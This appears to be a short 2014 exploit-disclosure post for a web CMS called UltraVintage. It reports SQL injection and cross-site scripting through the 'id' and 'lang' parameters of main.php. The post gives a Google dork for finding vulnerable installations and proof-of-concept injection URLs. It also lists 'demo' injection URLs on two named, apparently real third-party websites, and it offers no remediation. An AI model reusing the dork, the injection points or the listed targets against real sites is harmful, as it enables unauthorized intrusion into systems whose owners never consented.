[+] Title: UltraVintage Cross Site Scripting / SQL Injection
[+] Date: 2014/06/04
[+] Author: Hekt0r
[+] Vendor Homepage: http://www.ultravintage.com
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable File: /main.php
[+} Dork : intext:"Created by UltraVintage"
inurl:/main.php?id=
### POC:
[+] Exploit Sql Injection: http://site/main.php?id=[id]&lang=[SQL-Injection]
http://site/main.php?id=[SQL-Injection]
[+] Exploit Xss: http://site/main.php?id=[xss]
### Demo:
[+] Sqli:http://www.anakyklosi.gr/main.php?id=94&lang=en'
http://www.anakyklosi.gr/main.php?id=94'
http://www.mimel.gr/main.php?id=21&lang=en'
http://www.mimel.gr/main.php?id=21'
[+] Xss: http://www.anakyklosi.gr/main.php?id=
http://www.mimel.gr/main.php?id=
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Saeed.Jok3r, M4hdi,
ALIREZA_PROMIS, LiNuX-LoVeR
And All members of Iran Security Group
[+] iransec.net